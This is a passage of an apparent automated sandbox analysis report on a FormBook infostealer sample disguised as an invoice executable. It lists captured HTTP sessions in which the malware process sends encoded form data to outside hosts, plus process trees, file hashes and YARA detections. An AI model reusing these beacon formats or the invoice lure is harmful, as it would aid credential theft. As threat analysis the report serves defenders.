                                                        Sep 26, 2024 15:21:46.248105049 CEST1236INData Raw: 2e 31 33 38 31 38 2d 32 36 2e 36 30 35 36 35 68 33 2e 33 34 33 63 37 2e 38 30 30 32 31 2c 30 2c 31 34 2e 30 36 37 35 37 2c 31 2e 38 31 30 34 33 2c 31 38 2e 33 38 36 35 35 2c 35 2e 35 37 32 35 39 2c 34 2e 33 31 39 2d 33 2e 37 36 32 31 36 2c 31 30
                                                        Data Ascii: .13818-26.60565h3.343c7.80021,0,14.06757,1.81043,18.38655,5.57259,4.319-3.76216,10.72429-5.57259,18.52585-5.57259h3.34329c17.69146,0,28.13784,9.05517,28.13784,26.60565v50.00529A2.80436,2.80436,0,0,1,267.18568,150.10066Z" class="cls-2"></path><
                                                        Sep 26, 2024 15:21:46.249546051 CEST1236INData Raw: 34 36 32 2c 37 2e 39 36 37 37 34 2d 31 39 2e 37 34 36 38 33 2c 31 38 2e 35 32 37 35 31 2d 31 39 2e 37 34 36 38 33 61 34 34 2e 35 37 39 32 2c 34 34 2e 35 37 39 32 2c 30 2c 30 2c 31 2c 31 30 2e 34 38 31 33 37 2c 31 2e 30 35 38 31 34 63 31 2e 33 37
                                                        Data Ascii: 462,7.96774-19.74683,18.52751-19.74683a44.5792,44.5792,0,0,1,10.48137,1.05814c1.37978.32534,1.70512.81151,1.70512,2.11256v5.27988c0,.81184-.64733,1.21592-1.45884,1.21592h-.24628a70.35535,70.35535,0,0,0-10.48137-.56187c-3.81768,0-7.79988,2.1849
                                                        Sep 26, 2024 15:21:46.249572992 CEST537INData Raw: 38 31 32 37 68 2d 31 2e 39 35 35 31 63 2d 33 2e 37 33 32 35 36 2c 30 2d 35 2e 36 38 34 32 39 2c 31 2e 30 35 34 37 37 2d 35 2e 36 38 34 32 39 2c 36 2e 35 38 31 32 37 76 32 39 2e 31 36 33 33 33 61 31 2e 36 33 36 2c 31 2e 36 33 36 2c 30 2c 30 2c 31
                                                        Data Ascii: 8127h-1.9551c-3.73256,0-5.68429,1.05477-5.68429,6.58127v29.16333a1.636,1.636,0,0,1-1.54733,1.71185H827.2866a1.63824,1.63824,0,0,1-1.54733-1.71185V119.22548c0-10.23981,6.09476-15.52138,16.41161-15.52138h1.9551c4.55047,0,8.204,1.05814,10.72429,3


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        40192.168.2.44977944.207.39.65803844C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 26, 2024 15:21:48.335870028 CEST512OUTGET /zl4r/?wrRLLPUh=qAyzze+7Xxv+wA09CtJQAc1N08fgxsYjMF3PXk0d3f7QX0q4Jz2C7sJqIlEgcTB+GqBDI184c5mD0TMdCmIzOUWEYKg5UaPGXuwVBW400SE67lweB1cXDRo=&IH=BP3PrJvHc6MXcF HTTP/1.1
                                                        Host: www.wajf.net
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                        Accept-Language: en-us
                                                        Connection: close
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                                        Sep 26, 2024 15:21:48.790668964 CEST1236INHTTP/1.1 200 OK
                                                        Date: Thu, 26 Sep 2024 13:21:48 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Data Raw: 33 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 61 6d 65 42 72 69 67 68 74 20 2d 20 43 6f 6d 69 6e 67 20 53 6f 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 2c 20 64 69 76 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 [TRUNCATED]
                                                        Data Ascii: 3151<!DOCTYPE html><html><head> <link rel="icon" href="data:,"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>NameBright - Coming Soon</title> <style type="text/css"> body, div { box-sizing: border-box; } body { background-color: #f7f7f7; font: 18px sans-serif; } .page { display: flex; flex-direction: column; min-height: 100vh; height: 100%; } .wrapper { display: flex; flex-direction: column; min-height: 100vh; height: 100%; align-items: center; justify-content: center; } .container { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; width: 90vw; [TRUNCATED]
                                                        Sep 26, 2024 15:21:48.790930986 CEST224INData Raw: 74 3a 20 34 30 76 77 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 37 30 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 36 34 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20
                                                        Data Ascii: t: 40vw; max-height: 700px; min-height: 640px; background: #ffffff; border-radius: 1.5%; padding: 50px 5vw; } .main { display:
                                                        Sep 26, 2024 15:21:48.790941954 CEST1236INData Raw: 20 66 6c 65 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20
                                                        Data Ascii: flex; flex-direction: column; align-items: center; justify-content: end; width: 100%; padding: 12px 0; margin-bottom: 36px; border-bottom: 1px solid #9
                                                        Sep 26, 2024 15:21:48.791695118 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 6e 61 6d 65 62 72 69 67 68 74 2e 63 6f 6d 22 20 69 64 3d 22 6c 6f 67 6f 22 20 74 61 72 67 65 74 3d 22 5f 70 61 72 65 6e 74 22 20 61 6c 74 3d 22 4e 61 6d 65 42 72 69 67 68 74
                                                        Data Ascii: <a href="//www.namebright.com" id="logo" target="_parent" alt="NameBright.com - Next Generation Domain Registration"> <svg data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 884 177.95924" aria-la
                                                        Sep 26, 2024 15:21:48.791707039 CEST1236INData Raw: 2c 31 2d 32 2e 36 34 38 31 38 2c 32 2e 39 32 37 37 38 48 34 34 36 2e 35 36 37 37 39 61 32 2e 39 31 38 38 31 2c 32 2e 39 31 38 38 31 2c 30 2c 30 2c 31 2d 32 2e 37 38 36 31 33 2d 32 2e 39 32 37 37 38 56 37 38 2e 37 37 39 33 35 63 30 2d 31 2e 38 31
                                                        Data Ascii: ,1-2.64818,2.92778H446.56779a2.91881,2.91881,0,0,1-2.78613-2.92778V78.77935c0-1.81043,1.25192-3.34127,3.76218-4.17768,8.91384-2.92408,16.29653-4.03973,28.27274-4.03973,1.67249,0,4.04445.27925,4.04445,2.36893V83.5172C479.861,85.05007,479.02327,
                                                        Sep 26, 2024 15:21:48.793051958 CEST672INData Raw: 35 39 32 34 5a 4d 35 36 36 2e 37 38 35 38 2c 38 36 2e 38 35 38 38 32 61 37 36 2e 33 36 38 33 35 2c 37 36 2e 33 36 38 33 35 2c 30 2c 30 2c 30 2d 31 33 2e 33 36 39 34 34 2d 31 2e 32 35 35 32 39 63 2d 31 31 2e 39 38 32 36 31 2c 30 2d 31 34 2e 39 30
                                                        Data Ascii: 5924ZM566.7858,86.85882a76.36835,76.36835,0,0,0-13.36944-1.25529c-11.98261,0-14.90668,8.5017-14.90668,19.92245v10.726c0,11.42072,2.92407,19.92076,14.90668,19.92076a116.75844,116.75844,0,0,0,13.36944-1.117Zm93.44986,63.24184h-12.814a2.9212,2.92
                                                        Sep 26, 2024 15:21:48.793064117 CEST1236INData Raw: 35 36 36 2c 31 35 30 2e 31 30 30 36 36 5a 6d 35 33 2e 38 38 34 32 31 2c 30 41 31 32 31 2e 32 38 36 37 34 2c 31 32 31 2e 32 38 36 37 34 2c 30 2c 30 2c 31 2c 36 39 37 2e 38 32 33 2c 31 35 31 2e 32 31 34 33 63 2d 31 33 2e 37 38 39 36 34 2c 30 2d 32
                                                        Data Ascii: 566,150.10066Zm53.88421,0A121.28674,121.28674,0,0,1,697.823,151.2143c-13.78964,0-22.00708-4.73786-22.00708-20.89646V60.11556c0-1.53118,1.25529-2.50721,2.78647-2.78646l12.95191-2.22931h.4172a2.74559,2.74559,0,0,1,2.37229,2.78646V71.538h19.64152
                                                        Sep 26, 2024 15:21:48.794349909 CEST1236INData Raw: 2c 30 2c 30 2c 31 2c 34 37 35 2e 35 36 33 35 37 2c 34 39 2e 35 37 35 5a 22 20 63 6c 61 73 73 3d 22 63 6c 73 2d 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 64 3d 22 4d 35 35 32 2e 32 36 2c 34 39 2e 35 37 35 76 35 2e 37 33 38 34 36 61 31 2e 33
                                                        Data Ascii: ,0,0,1,475.56357,49.575Z" class="cls-2"></path><path d="M552.26,49.575v5.73846a1.30639,1.30639,0,0,1-1.31115,1.24352h-25.631a1.24975,1.24975,0,0,1-1.25192-1.24352V49.57666a1.25119,1.25119,0,0,1,1.24519-1.24688h25.63467A1.30971,1.30971,0,0,1,55
                                                        Sep 26, 2024 15:21:48.794362068 CEST448INData Raw: 2c 32 2e 37 38 39 35 31 48 32 2e 37 38 34 37 38 41 32 2e 37 39 34 35 36 2c 32 2e 37 39 34 35 36 2c 30 2c 30 2c 31 2c 30 2c 31 34 37 2e 33 31 31 31 35 56 35 32 2e 31 37 34 61 35 2e 35 38 38 31 39 2c 35 2e 35 38 38 31 39 2c 30 2c 30 2c 31 2c 35 2e
                                                        Data Ascii: ,2.78951H2.78478A2.79456,2.79456,0,0,1,0,147.31115V52.174a5.58819,5.58819,0,0,1,5.56923-5.57091H20.61587c2.92407,0,4.45693.83641,6.12941,4.45726l32.4538,71.59518c.27926.69678.69645,1.11734,1.11533,1.11734.27925,0,.69813-.42056.69813-1.25529v-7
                                                        Sep 26, 2024 15:21:48.794372082 CEST1236INData Raw: 32 38 2c 30 2c 30 2c 31 2d 32 37 2e 39 39 38 35 35 2c 33 2e 36 32 30 38 36 63 2d 32 32 2e 34 32 37 36 34 2c 30 2d 33 33 2e 32 38 39 38 38 2d 31 33 2e 32 33 34 35 33 2d 33 33 2e 32 38 39 38 38 2d 33 34 2e 39 36 32 33 35 56 31 30 35 2e 35 32 36 63
                                                        Data Ascii: 28,0,0,1-27.99855,3.62086c-22.42764,0-33.28988-13.23453-33.28988-34.96235V105.526c0-21.73119,10.86224-34.964,33.28988-34.964a118.86956,118.86956,0,0,1,27.99855,3.62086c3.20164.83607,3.76015,1.67248,3.76015,3.76216v65.88666C156.57664,145.9213,1
                                                        Sep 26, 2024 15:21:48.796078920 CEST1236INData Raw: 73 73 3d 22 63 6c 73 2d 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 64 3d 22 4d 33 34 34 2e 35 30 34 38 36 2c 31 31 37 2e 32 32 38 48 32 39 39 2e 30 39 34 31 76 2e 34 32 30 35 36 63 30 2c 38 2e 30 37 35 37 37 2c 33 2e 33 34 35 2c 31 37 2e 36
                                                        Data Ascii: ss="cls-2"></path><path d="M344.50486,117.228H299.0941v.42056c0,8.07577,3.345,17.68641,16.71576,17.68641,10.16713,0,19.78114-.83473,25.62928-1.38986h.41922c1.39289,0,2.50689.69644,2.50689,2.08631v9.19648c0,2.22458-.4189,3.20028-2.92611,3.61748


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        41192.168.2.449780217.70.184.50803844C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 26, 2024 15:21:53.993870020 CEST780OUTPOST /yvck/ HTTP/1.1
                                                        Host: www.turbonotes.app
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                        Accept-Language: en-us
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.turbonotes.app
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Length: 205
                                                        Referer: http://www.turbonotes.app/yvck/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                                        Data Raw: 77 72 52 4c 4c 50 55 68 3d 4f 49 4d 74 47 61 58 4c 6c 31 76 6b 74 53 43 78 58 57 75 57 69 7a 54 55 76 63 32 68 47 79 35 62 46 31 44 6f 42 43 68 2f 49 63 52 46 2b 68 6e 41 69 31 49 77 70 36 72 79 32 45 69 70 62 52 79 47 31 44 32 37 4a 6c 36 52 74 55 31 33 2b 74 6f 2b 67 73 4c 38 36 73 79 69 61 67 49 53 41 78 56 68 76 34 64 4c 79 4b 54 6d 4e 6b 31 70 62 63 2b 33 78 34 6f 49 51 6d 32 31 6b 78 51 42 66 64 4c 56 56 7a 4c 7a 68 31 52 2b 36 39 78 31 74 77 39 4c 4d 31 4b 6b 57 44 4f 49 48 2b 4f 6b 48 7a 44 4f 48 4d 71 33 30 33 79 4c 41 49 71 2b 36 6c 59 74 55 4c 49 75 59 67 73 4f 57 42 78 33 73 69 4a 45 55 41 3d 3d
                                                        Data Ascii: wrRLLPUh=OIMtGaXLl1vktSCxXWuWizTUvc2hGy5bF1DoBCh/IcRF+hnAi1Iwp6ry2EipbRyG1D27Jl6RtU13+to+gsL86syiagISAxVhv4dLyKTmNk1pbc+3x4oIQm21kxQBfdLVVzLzh1R+69x1tw9LM1KkWDOIH+OkHzDOHMq303yLAIq+6lYtULIuYgsOWBx3siJEUA==
                                                        Sep 26, 2024 15:21:54.581438065 CEST608INHTTP/1.1 501 Unsupported method ('POST')
                                                        Server: nginx
                                                        Date: Thu, 26 Sep 2024 13:21:54 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                        Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        42192.168.2.449781217.70.184.50803844C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 26, 2024 15:21:56.543865919 CEST800OUTPOST /yvck/ HTTP/1.1
                                                        Host: www.turbonotes.app
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                        Accept-Language: en-us
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.turbonotes.app
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Length: 225
                                                        Referer: http://www.turbonotes.app/yvck/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                                        Data Raw: 77 72 52 4c 4c 50 55 68 3d 4f 49 4d 74 47 61 58 4c 6c 31 76 6b 74 79 79 78 52 31 32 57 72 7a 54 58 79 73 32 68 4e 53 35 58 46 31 66 6f 42 48 5a 76 49 75 6c 46 39 45 62 41 6a 30 49 77 6f 36 72 79 34 6b 69 77 52 78 7a 4b 31 44 36 43 4a 67 43 52 74 55 68 33 2b 76 77 2b 6e 66 54 2f 6f 4d 79 67 50 51 49 51 4f 52 56 68 76 34 64 4c 79 4b 48 49 4e 67 52 70 63 74 4f 33 77 63 30 4c 5a 47 32 32 73 52 51 42 62 64 4c 52 56 7a 4b 63 68 30 64 41 36 37 39 31 74 77 4e 4c 4e 6b 4b 6e 5a 44 4f 4b 5a 4f 50 31 4a 69 6d 58 41 5a 50 38 71 78 79 7a 47 35 79 68 2f 6a 4a 33 46 36 70 35 4b 67 49 39 4c 47 34 44 68 68 30 4e 50 45 49 69 49 6c 71 4c 50 39 77 75 30 64 37 67 45 44 73 62 38 72 34 3d
                                                        Data Ascii: wrRLLPUh=OIMtGaXLl1vktyyxR12WrzTXys2hNS5XF1foBHZvIulF9EbAj0Iwo6ry4kiwRxzK1D6CJgCRtUh3+vw+nfT/oMygPQIQORVhv4dLyKHINgRpctO3wc0LZG22sRQBbdLRVzKch0dA6791twNLNkKnZDOKZOP1JimXAZP8qxyzG5yh/jJ3F6p5KgI9LG4Dhh0NPEIiIlqLP9wu0d7gEDsb8r4=
                                                        Sep 26, 2024 15:21:57.158108950 CEST608INHTTP/1.1 501 Unsupported method ('POST')
                                                        Server: nginx
                                                        Date: Thu, 26 Sep 2024 13:21:57 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                        Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                        Click to jump to process

                                                        Click to jump to process

                                                        Click to dive into process behavior distribution

                                                        Click to jump to process

                                                        Target ID:0
                                                        Start time:09:17:48
                                                        Start date:26/09/2024
                                                        Path:C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exe"
                                                        Imagebase:0x400000
                                                        File size:1'361'303 bytes
                                                        MD5 hash:8F28011C24818124770BA3D2AF3591B1
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:1
                                                        Start time:09:17:53
                                                        Start date:26/09/2024
                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exe"
                                                        Imagebase:0x1c0000
                                                        File size:46'504 bytes
                                                        MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2145065547.0000000008C40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2145065547.0000000008C40000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2140144317.0000000004A90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2140144317.0000000004A90000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2139429646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2139429646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:5
                                                        Start time:09:18:25
                                                        Start date:26/09/2024
                                                        Path:C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe"
                                                        Imagebase:0x6d0000
                                                        File size:140'800 bytes
                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4159290006.0000000003730000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4159290006.0000000003730000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:6
                                                        Start time:09:18:27
                                                        Start date:26/09/2024
                                                        Path:C:\Windows\SysWOW64\TapiUnattend.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\SysWOW64\TapiUnattend.exe"
                                                        Imagebase:0x2e0000
                                                        File size:12'800 bytes
                                                        MD5 hash:D5BFFD755F566AAACB57CF83FDAA5CD0
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4158565810.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4158565810.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4159371435.0000000003130000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4159371435.0000000003130000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4158281170.0000000002C30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4158281170.0000000002C30000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                        Reputation:moderate
                                                        Has exited:false

                                                        Target ID:7
                                                        Start time:09:18:43
                                                        Start date:26/09/2024
                                                        Path:C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe"
                                                        Imagebase:0x6d0000
                                                        File size:140'800 bytes
                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4161197958.00000000052B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4161197958.00000000052B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:8
                                                        Start time:09:18:55
                                                        Start date:26/09/2024
                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                        Imagebase:0x800000
                                                        File size:676'768 bytes
                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:3.5%
                                                          Dynamic/Decrypted Code Coverage:0.4%
                                                          Signature Coverage:8.8%
                                                          Total number of Nodes:2000
                                                          Total number of Limit Nodes:36
